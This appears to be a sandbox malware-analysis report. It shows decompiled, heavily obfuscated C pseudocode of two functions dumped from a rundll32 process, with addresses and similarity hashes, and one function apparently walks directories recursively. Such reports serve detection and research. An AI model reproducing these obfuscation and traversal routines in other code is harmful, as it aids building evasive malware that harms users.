                                                                                                                                    0x002d160f
                                                                                                                                    0x002d1613
                                                                                                                                    0x002d1614
                                                                                                                                    0x002d1615
                                                                                                                                    0x002d1616
                                                                                                                                    0x002d1617
                                                                                                                                    0x002d1629
                                                                                                                                    0x002d162d
                                                                                                                                    0x002d162e
                                                                                                                                    0x002d1633
                                                                                                                                    0x002d1636
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Fo$M_o9$[K
                                                                                                                                    • API String ID: 0-3743190696
                                                                                                                                    • Opcode ID: c0ff45edf336e4603ab9c4199ffc18cb6e1be64abb468246e7793c2eec1268a4
                                                                                                                                    • Instruction ID: 94cde3bb40bf9d2fe5355c4998eec6755f4d90603170921c219350ca71284c9a
                                                                                                                                    • Opcode Fuzzy Hash: c0ff45edf336e4603ab9c4199ffc18cb6e1be64abb468246e7793c2eec1268a4
                                                                                                                                    • Instruction Fuzzy Hash: 36121EB14093819FD368CF21C58AA8BBBF1FBC5748F108A1DE59A96260D7B18919CF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C9DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E002C9DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E002DDCF7(_v80, 0x2c17a0, __eflags);
									_pop(_t327);
									E002C47CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E002C9DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E002CA8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E002CA918(_t317, __eflags, _v8, _v96, E002DDCF7(_v56, 0x2c1770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E002CA8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E002C7E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E002C4635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E002C8ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                                    0x002c9dd9
                                                                                                                                    0x002c9dde
                                                                                                                                    0x002c9de1
                                                                                                                                    0x002c9de4
                                                                                                                                    0x002c9de7
                                                                                                                                    0x002c9de8
                                                                                                                                    0x002c9deb
                                                                                                                                    0x002c9dee
                                                                                                                                    0x002c9def
                                                                                                                                    0x002c9df0
                                                                                                                                    0x002c9df5
                                                                                                                                    0x002c9dfc
                                                                                                                                    0x002c9dff
                                                                                                                                    0x002c9e08
                                                                                                                                    0x002c9e0f
                                                                                                                                    0x002c9e14
                                                                                                                                    0x002c9e1b
                                                                                                                                    0x002c9e22
                                                                                                                                    0x002c9e25
                                                                                                                                    0x002c9e2c
                                                                                                                                    0x002c9e33
                                                                                                                                    0x002c9e3f
                                                                                                                                    0x002c9e44
                                                                                                                                    0x002c9e49
                                                                                                                                    0x002c9e50
                                                                                                                                    0x002c9e57
                                                                                                                                    0x002c9e5e
                                                                                                                                    0x002c9e65
                                                                                                                                    0x002c9e70
                                                                                                                                    0x002c9e71
                                                                                                                                    0x002c9e74
                                                                                                                                    0x002c9e7f
                                                                                                                                    0x002c9e82
                                                                                                                                    0x002c9e89
                                                                                                                                    0x002c9e90
                                                                                                                                    0x002c9e97
                                                                                                                                    0x002c9e9e
                                                                                                                                    0x002c9ea9
                                                                                                                                    0x002c9eac
                                                                                                                                    0x002c9eb3
                                                                                                                                    0x002c9eba
                                                                                                                                    0x002c9ebe
                                                                                                                                    0x002c9ec5
                                                                                                                                    0x002c9ed1
                                                                                                                                    0x002c9ed8
                                                                                                                                    0x002c9edb
                                                                                                                                    0x002c9ee2
                                                                                                                                    0x002c9ee9
                                                                                                                                    0x002c9ef0
                                                                                                                                    0x002c9ef7
                                                                                                                                    0x002c9efe
                                                                                                                                    0x002c9f02
                                                                                                                                    0x002c9f09
                                                                                                                                    0x002c9f10
                                                                                                                                    0x002c9f17
                                                                                                                                    0x002c9f1e
                                                                                                                                    0x002c9f25
                                                                                                                                    0x002c9f2c
                                                                                                                                    0x002c9f33
                                                                                                                                    0x002c9f3a
                                                                                                                                    0x002c9f41
                                                                                                                                    0x002c9f48
                                                                                                                                    0x002c9f4f
                                                                                                                                    0x002c9f56
                                                                                                                                    0x002c9f5d
                                                                                                                                    0x002c9f64
                                                                                                                                    0x002c9f6b
                                                                                                                                    0x002c9f71
                                                                                                                                    0x002c9f78
                                                                                                                                    0x002c9f7f
                                                                                                                                    0x002c9f86
                                                                                                                                    0x002c9f92
                                                                                                                                    0x002c9f97
                                                                                                                                    0x002c9f9c
                                                                                                                                    0x002c9fa3
                                                                                                                                    0x002c9faa
                                                                                                                                    0x002c9fb1
                                                                                                                                    0x002c9fbc
                                                                                                                                    0x002c9fbf
                                                                                                                                    0x002c9fc2
                                                                                                                                    0x002c9fc9
                                                                                                                                    0x002c9fd0
                                                                                                                                    0x002c9fde
                                                                                                                                    0x002c9fe1
                                                                                                                                    0x002c9fe8
                                                                                                                                    0x002c9fef
                                                                                                                                    0x002c9ffa
                                                                                                                                    0x002c9ffd
                                                                                                                                    0x002ca000
                                                                                                                                    0x002ca007
                                                                                                                                    0x002ca00e
                                                                                                                                    0x002ca012
                                                                                                                                    0x002ca019
                                                                                                                                    0x002ca01c
                                                                                                                                    0x002ca023
                                                                                                                                    0x002ca02e
                                                                                                                                    0x002ca038
                                                                                                                                    0x002ca03b
                                                                                                                                    0x002ca03f
                                                                                                                                    0x002ca046
                                                                                                                                    0x002ca051
                                                                                                                                    0x002ca052
                                                                                                                                    0x002ca055
                                                                                                                                    0x002ca059
                                                                                                                                    0x002ca060
                                                                                                                                    0x002ca06b
                                                                                                                                    0x002ca06e
                                                                                                                                    0x002ca075
                                                                                                                                    0x002ca07c
                                                                                                                                    0x002ca083
                                                                                                                                    0x002ca08a
                                                                                                                                    0x002ca091
                                                                                                                                    0x002ca098
                                                                                                                                    0x002ca09f
                                                                                                                                    0x002ca0aa
                                                                                                                                    0x002ca0ad
                                                                                                                                    0x002ca0b1
                                                                                                                                    0x002ca0b5
                                                                                                                                    0x002ca0bc
                                                                                                                                    0x002ca0c8
                                                                                                                                    0x002ca0cb
                                                                                                                                    0x002ca0d2
                                                                                                                                    0x002ca0d9
                                                                                                                                    0x002ca0e0
                                                                                                                                    0x002ca0e7
                                                                                                                                    0x002ca0eb
                                                                                                                                    0x002ca0f2
                                                                                                                                    0x002ca0f5
                                                                                                                                    0x002ca0fc
                                                                                                                                    0x002ca103
                                                                                                                                    0x002ca10a
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca113
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca114
                                                                                                                                    0x002ca126
                                                                                                                                    0x002ca2d3
                                                                                                                                    0x002ca2d9
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca2d9
                                                                                                                                    0x002ca132
                                                                                                                                    0x002ca1fa
                                                                                                                                    0x002ca200
                                                                                                                                    0x002ca2bf
                                                                                                                                    0x002ca2c6
                                                                                                                                    0x002ca2c8
                                                                                                                                    0x002ca174
                                                                                                                                    0x002ca174
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca113
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca113
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca206
                                                                                                                                    0x002ca20d
                                                                                                                                    0x002ca236
                                                                                                                                    0x002ca236
                                                                                                                                    0x002ca23a
                                                                                                                                    0x002ca23c
                                                                                                                                    0x002ca244
                                                                                                                                    0x002ca24a
                                                                                                                                    0x002ca250
                                                                                                                                    0x002ca273
                                                                                                                                    0x002ca294
                                                                                                                                    0x002ca2a1
                                                                                                                                    0x002ca2a6
                                                                                                                                    0x002ca2ab
                                                                                                                                    0x002ca2ab
                                                                                                                                    0x002ca22c
                                                                                                                                    0x002ca22c
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca22c
                                                                                                                                    0x002ca20f
                                                                                                                                    0x002ca217
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca219
                                                                                                                                    0x002ca220
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca222
                                                                                                                                    0x002ca22a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca22a
                                                                                                                                    0x002ca13e
                                                                                                                                    0x002ca1af
                                                                                                                                    0x002ca1b7
                                                                                                                                    0x002ca1d7
                                                                                                                                    0x002ca1dc
                                                                                                                                    0x002ca1e7
                                                                                                                                    0x002ca1ed
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca113
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca113
                                                                                                                                    0x002ca111
                                                                                                                                    0x002ca146
                                                                                                                                    0x002ca192
                                                                                                                                    0x002ca197
                                                                                                                                    0x002ca199
                                                                                                                                    0x002ca19c
                                                                                                                                    0x002ca19f
                                                                                                                                    0x002ca30b
                                                                                                                                    0x002ca30b
                                                                                                                                    0x002ca30b
                                                                                                                                    0x002ca1a5
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca1a5
                                                                                                                                    0x002ca14e
                                                                                                                                    0x002ca2f9
                                                                                                                                    0x002ca2f9
                                                                                                                                    0x002ca2ff
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca2ff
                                                                                                                                    0x002ca161
                                                                                                                                    0x002ca16c
                                                                                                                                    0x002ca16e
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca16e
                                                                                                                                    0x002ca2eb
                                                                                                                                    0x002ca2f3
                                                                                                                                    0x002ca2f8
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca2f8

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: H&!$Up7$yBd&
                                                                                                                                    • API String ID: 0-2352930472
                                                                                                                                    • Opcode ID: e890f45a983ad430243ba5b473c4585fbf716412f7b7fe6da148e766f921e43b
                                                                                                                                    • Instruction ID: a4ff0ce35ff9327eb28d697eecee3c051c4f261e4b8e1d17a097455f592ae475
                                                                                                                                    • Opcode Fuzzy Hash: e890f45a983ad430243ba5b473c4585fbf716412f7b7fe6da148e766f921e43b
                                                                                                                                    • Instruction Fuzzy Hash: E9E14371D0021EDBCF28DFA0D98A9EEBBB1FB44318F20825DE516BA260D7B40A55CF41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D95FA Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002D95FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E002C5DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E002DDCF7(_v632, 0x2c1000, __eflags);
								_pop(_t317);
								_t299 =  *0x2e3e10; // 0x0
								_t334 =  *0x2e3e10; // 0x0
								E002C47CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E002CA8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E002D1E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E002C8F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E002DC1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E002DABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                                    0x002d9600
                                                                                                                                    0x002d960a
                                                                                                                                    0x002d9612
                                                                                                                                    0x002d9620
                                                                                                                                    0x002d9624
                                                                                                                                    0x002d9626
                                                                                                                                    0x002d962e
                                                                                                                                    0x002d9636
                                                                                                                                    0x002d9645
                                                                                                                                    0x002d9648
                                                                                                                                    0x002d9651
                                                                                                                                    0x002d9655
                                                                                                                                    0x002d965d
                                                                                                                                    0x002d9665
                                                                                                                                    0x002d966d
                                                                                                                                    0x002d9672
                                                                                                                                    0x002d967a
                                                                                                                                    0x002d9682
                                                                                                                                    0x002d9686
                                                                                                                                    0x002d968b
                                                                                                                                    0x002d9693
                                                                                                                                    0x002d969b
                                                                                                                                    0x002d96a0
                                                                                                                                    0x002d96a8
                                                                                                                                    0x002d96ad
                                                                                                                                    0x002d96b5
                                                                                                                                    0x002d96bd
                                                                                                                                    0x002d96c5
                                                                                                                                    0x002d96cd
                                                                                                                                    0x002d96dd
                                                                                                                                    0x002d96e1
                                                                                                                                    0x002d96e9
                                                                                                                                    0x002d96f1
                                                                                                                                    0x002d96f9
                                                                                                                                    0x002d9701
                                                                                                                                    0x002d9709
                                                                                                                                    0x002d9711
                                                                                                                                    0x002d9719
                                                                                                                                    0x002d9721
                                                                                                                                    0x002d972d
                                                                                                                                    0x002d9732
                                                                                                                                    0x002d9738
                                                                                                                                    0x002d9740
                                                                                                                                    0x002d9748
                                                                                                                                    0x002d9755
                                                                                                                                    0x002d9756
                                                                                                                                    0x002d975a
                                                                                                                                    0x002d9762
                                                                                                                                    0x002d976a
                                                                                                                                    0x002d9775
                                                                                                                                    0x002d9779
                                                                                                                                    0x002d9781
                                                                                                                                    0x002d9789
                                                                                                                                    0x002d978e
                                                                                                                                    0x002d9796
                                                                                                                                    0x002d979e
                                                                                                                                    0x002d97a6
                                                                                                                                    0x002d97ae
                                                                                                                                    0x002d97b6
                                                                                                                                    0x002d97bb
                                                                                                                                    0x002d97c3
                                                                                                                                    0x002d97ce
                                                                                                                                    0x002d97db
                                                                                                                                    0x002d97eb
                                                                                                                                    0x002d97f3
                                                                                                                                    0x002d97fb
                                                                                                                                    0x002d9800
                                                                                                                                    0x002d9808
                                                                                                                                    0x002d9817
                                                                                                                                    0x002d9818
                                                                                                                                    0x002d9821
                                                                                                                                    0x002d9825
                                                                                                                                    0x002d982d
                                                                                                                                    0x002d9835
                                                                                                                                    0x002d983d
                                                                                                                                    0x002d9845
                                                                                                                                    0x002d984d
